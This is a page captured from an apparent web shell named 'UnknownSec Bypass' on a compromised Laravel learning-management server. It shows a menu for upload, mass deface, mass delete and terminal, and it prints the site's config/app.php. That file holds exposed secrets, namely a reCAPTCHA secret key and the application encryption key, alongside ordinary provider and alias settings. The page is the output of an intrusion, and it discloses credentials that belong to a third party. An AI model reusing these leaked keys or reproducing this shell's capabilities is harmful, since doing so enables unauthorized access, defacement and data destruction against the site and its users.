UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_adacfe8c5fb8
/
config
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
app.php
<?php return [ /* |-------------------------------------------------------------------------- | Application Debug Mode |-------------------------------------------------------------------------- | | When your application is in debug mode, detailed error messages with | stack traces will be shown on every error that occurs within your | application. If disabled, a simple generic error page is shown. | */ 'GOOGLE_RECAPTCHA_SECRET' => env('GOOGLE_RECAPTCHA_SECRET', '6LeO_iQUAAAAALu9IRSR0ANdv0maLJagjbAaVCtS'), 'GOOGLE_RECAPTCHA_KEY' => env('GOOGLE_RECAPTCHA_KEY', '6LeO_iQUAAAAALpVMcDvDW-Yh1TAAnT-R5BNPxGe'), 'SUPPORT_API_ENDPOINT' => env('SUPPORT_API_EDPOINT', 'https://suporte.estudiosite.com.br/api/v1/'), 'debug' => env('APP_DEBUG', false), /* |-------------------------------------------------------------------------- | Application URL |-------------------------------------------------------------------------- | | This URL is used by the console to properly generate URLs when using | the Artisan command line tool. You should set this to the root of | your application so that it is used when running Artisan tasks. | */ 'url' => 'http://estudiolms.app', /* |-------------------------------------------------------------------------- | Application Timezone |-------------------------------------------------------------------------- | | Here you may specify the default timezone for your application, which | will be used by the PHP date and date-time functions. We have gone | ahead and set this to a sensible default for you out of the box. | */ 'timezone' => 'America/Sao_Paulo', /* |-------------------------------------------------------------------------- | Application Locale Configuration |-------------------------------------------------------------------------- | | The application locale determines the default locale that will be used | by the translation service provider. You are free to set this value | to any of the locales which will be supported by the application. | */ 'locale' => 'pt', /* |-------------------------------------------------------------------------- | Application Fallback Locale |-------------------------------------------------------------------------- | | The fallback locale determines the locale to use when the current one | is not available. You may change the value to correspond to any of | the language folders that are provided through your application. | */ 'fallback_locale' => 'pt', /* |-------------------------------------------------------------------------- | Encryption Key |-------------------------------------------------------------------------- | | This key is used by the Illuminate encrypter service and should be set | to a random, 32 character string, otherwise these encrypted strings | will not be safe. Please do this before deploying an application! | */ 'key' => env('APP_KEY', '668dLsC1jZyQOBeN0vIQgJ5jEgu1Tbjf'), //'cipher' => MCRYPT_RIJNDAEL_128, 'cipher' => 'AES-256-CBC', /* |-------------------------------------------------------------------------- | Logging Configuration |-------------------------------------------------------------------------- | | Here you may configure the log settings for your application. Out of | the box, Laravel uses the Monolog PHP logging library. This gives | you a variety of powerful log handlers / formatters to utilize. | | Available Settings: "single", "daily", "syslog", "errorlog" | */ 'log' => 'daily', /* |-------------------------------------------------------------------------- | Autoloaded Service Providers |-------------------------------------------------------------------------- | | The service providers listed here will be automatically loaded on the | request to your application. Feel free to add your own services to | this array to grant expanded functionality to your applications. | */ 'providers' => [ /* * Debugbar * Precisa ser o primeiro provedor da lista para poder exibir corretamente a debugbar */ 'Barryvdh\Debugbar\ServiceProvider', /* * Laravel Framework Service Providers... */ 'Illuminate\Foundation\Providers\ArtisanServiceProvider', 'Illuminate\Auth\AuthServiceProvider', EstudioLMS\Providers\AuthServiceProvider::class, 'Illuminate\Bus\BusServiceProvider', 'Illuminate\Cache\CacheServiceProvider', 'Illuminate\Foundation\Providers\ConsoleSupportServiceProvider', 'Illuminate\Routing\ControllerServiceProvider', 'Illuminate\Cookie\CookieServiceProvider', 'Illuminate\Database\DatabaseServiceProvider', 'Illuminate\Encryption\EncryptionServiceProvider', 'Illuminate\Filesystem\FilesystemServiceProvider', 'Illuminate\Foundation\Providers\FoundationServiceProvider', 'Illuminate\Hashing\HashServiceProvider', 'Illuminate\Mail\MailServiceProvider', //EstudioLMS\Providers\CustomMailServiceProvider::class, 'Illuminate\Pagination\PaginationServiceProvider', 'Illuminate\Pipeline\PipelineServiceProvider', 'Illuminate\Queue\QueueServiceProvider', 'Illuminate\Redis\RedisServiceProvider', 'Illuminate\Auth\Passwords\PasswordResetServiceProvider', 'Illuminate\Session\SessionServiceProvider', 'Illuminate\Translation\TranslationServiceProvider', //'Illuminate\Validation\ValidationServiceProvider', EstudioLMS\Validator\CustomValidatorServiceProvider::class, 'Illuminate\View\ViewServiceProvider', Illuminate\Broadcasting\BroadcastServiceProvider::class, /* * Illuminate/html */ Collective\Html\HtmlServiceProvider::class, /* * Application Service Providers... */ 'EstudioLMS\Providers\AppServiceProvider', 'EstudioLMS\Providers\BusServiceProvider', 'EstudioLMS\Providers\ConfigServiceProvider', 'EstudioLMS\Providers\EventServiceProvider', 'EstudioLMS\Providers\RouteServiceProvider', 'EstudioLMS\Providers\RepositoryServiceProvider', EstudioLMS\Providers\CourseComposerServiceProvider::class, EstudioLMS\Providers\AdminComposerServiceProvider::class, EstudioLMS\Providers\SiteFooterServiceProvider::class, EstudioLMS\Providers\EnvironmentServiceProvider::class, EstudioLMS\Providers\LaravelPagseguroServiceProvider::class, EstudioLMS\Providers\CustomRulesServiceProvider::class, EstudioLMS\Providers\LoadFacadesServiceProvider::class, EstudioLMS\Providers\ResourceRepositoryServiceProvider::class, EstudioLMS\Providers\PostbackModelServiceProvider::class, /* * Outros provedores adcionais (de terceiros) */ 'Anhskohbo\NoCaptcha\NoCaptchaServiceProvider', 'Laravel\Socialite\SocialiteServiceProvider', 'Barryvdh\TranslationManager\ManagerServiceProvider', 'Artesaos\SEOTools\Providers\SEOToolsServiceProvider', //Barryvdh\Elfinder\ElfinderServiceProvider::class, EstudioLMS\Providers\ElfinderServiceProvider::class, Cohensive\Embed\EmbedServiceProvider::class, /* * Laravel Ide Helper */ 'Barryvdh\LaravelIdeHelper\IdeHelperServiceProvider', /* * ACL Zizaco Entrust */ 'Zizaco\Entrust\EntrustServiceProvider', /* * Prettus Respository Pattern */ 'Prettus\Repository\Providers\RepositoryServiceProvider', /* * Dimsav - Laravel - Translatable */ Dimsav\Translatable\TranslatableServiceProvider::class, /* * Laracasts Flash Message */ Laracasts\Flash\FlashServiceProvider::class, /* * Intervention/Image */ Intervention\Image\ImageServiceProvider::class, /* * PDF Warapper */ //Barryvdh\Snappy\ServiceProvider::class, Barryvdh\DomPDF\ServiceProvider::class, /* * Felixkiss\UniqueWithValidator\UniqueWithValidatorServiceProvider * Validação unique com 2 campos */ Felixkiss\UniqueWithValidator\UniqueWithValidatorServiceProvider::class, /* * Image validator * https://github.com/cviebrock/image-validator */ Cviebrock\ImageValidator\ImageValidatorServiceProvider::class, ], /* |-------------------------------------------------------------------------- | Class Aliases |-------------------------------------------------------------------------- | | This array of class aliases will be registered when this application | is started. However, feel free to register as many as you wish as | the aliases are "lazy" loaded so they don't hinder performance. | */ 'aliases' => [ 'App' => 'Illuminate\Support\Facades\App', 'Artisan' => 'Illuminate\Support\Facades\Artisan', 'Auth' => 'Illuminate\Support\Facades\Auth', 'Blade' => 'Illuminate\Support\Facades\Blade', 'Bus' => 'Illuminate\Support\Facades\Bus', 'Cache' => 'Illuminate\Support\Facades\Cache', 'Config' => 'Illuminate\Support\Facades\Config', 'Cookie' => 'Illuminate\Support\Facades\Cookie', 'Crypt' => 'Illuminate\Support\Facades\Crypt', 'DB' => 'Illuminate\Support\Facades\DB', 'Eloquent' => 'Illuminate\Database\Eloquent\Model', 'Event' => 'Illuminate\Support\Facades\Event', 'File' => 'Illuminate\Support\Facades\File', 'Hash' => 'Illuminate\Support\Facades\Hash', 'Input' => 'Illuminate\Support\Facades\Input', 'Inspiring' => 'Illuminate\Foundation\Inspiring', 'Lang' => 'Illuminate\Support\Facades\Lang', 'Log' => 'Illuminate\Support\Facades\Log', 'Mail' => 'Illuminate\Support\Facades\Mail', 'Password' => 'Illuminate\Support\Facades\Password', 'Queue' => 'Illuminate\Support\Facades\Queue', 'Redirect' => 'Illuminate\Support\Facades\Redirect', 'Redis' => 'Illuminate\Support\Facades\Redis', 'Request' => 'Illuminate\Support\Facades\Request', 'Response' => 'Illuminate\Support\Facades\Response', 'Route' => 'Illuminate\Support\Facades\Route', 'Schema' => 'Illuminate\Support\Facades\Schema', 'Session' => 'Illuminate\Support\Facades\Session', 'Storage' => 'Illuminate\Support\Facades\Storage', 'URL' => 'Illuminate\Support\Facades\URL', 'Validator' => 'Illuminate\Support\Facades\Validator', 'View' => 'Illuminate\Support\Facades\View', 'Form' => 'Collective\Html\FormFacade', 'HTML' => 'Collective\Html\HtmlFacade', 'Socialite' => 'Laravel\Socialite\Facades\Socialite', 'Debugbar' => 'Barryvdh\Debugbar\Facade', 'SEO' => 'Artesaos\SEOTools\Facades\SEOTools', 'Entrust' => 'Zizaco\Entrust\EntrustFacade', 'Flash' => 'Laracasts\Flash\Flash', 'Embed' => 'Cohensive\Embed\Facades\Embed', 'MyHelper' => 'EstudioLMS\Helpers\Helpers', 'HtmlHelper' => 'EstudioLMS\Helpers\HtmlHelper', 'GatHelper' => 'EstudioLMS\Helpers\GatewayHelper', 'CartHelper' => EstudioLMS\Helpers\CartHelperFacade::class, 'MailLog' => EstudioLMS\Services\Logger\MailLogFacade::class, 'AdminFinancial' => 'EstudioLMS\Helpers\Admin\Financial', 'Image' => 'Intervention\Image\Facades\Image', //'PDF' => 'Barryvdh\Snappy\Facades\SnappyPdf', 'PDF' => Barryvdh\DomPDF\Facade::class, /* * Render Courses Resources */ 'AdminResourceHelper' => EstudioLMS\Helpers\Admin\CourseResources\AdminResourcesHelperFacade::class, //'ShowCourseDetail' => EstudioLMS\Helpers\Environment\ShowCourseHelperFacade::class, /* * Render Environment Student Lessons */ 'ListLesson' => EstudioLMS\Helpers\Environment\Student\Courses\Listing\ListResourcesFacade::class, 'CourseHelper' => EstudioLMS\Helpers\Environment\Student\Courses\CourseHelperFacade::class, 'LandResourceRender' => EstudioLMS\Helpers\Site\Landpage\ResourcesRenderFacade::class, ], ];
Copyright © 2026 - UnknownSec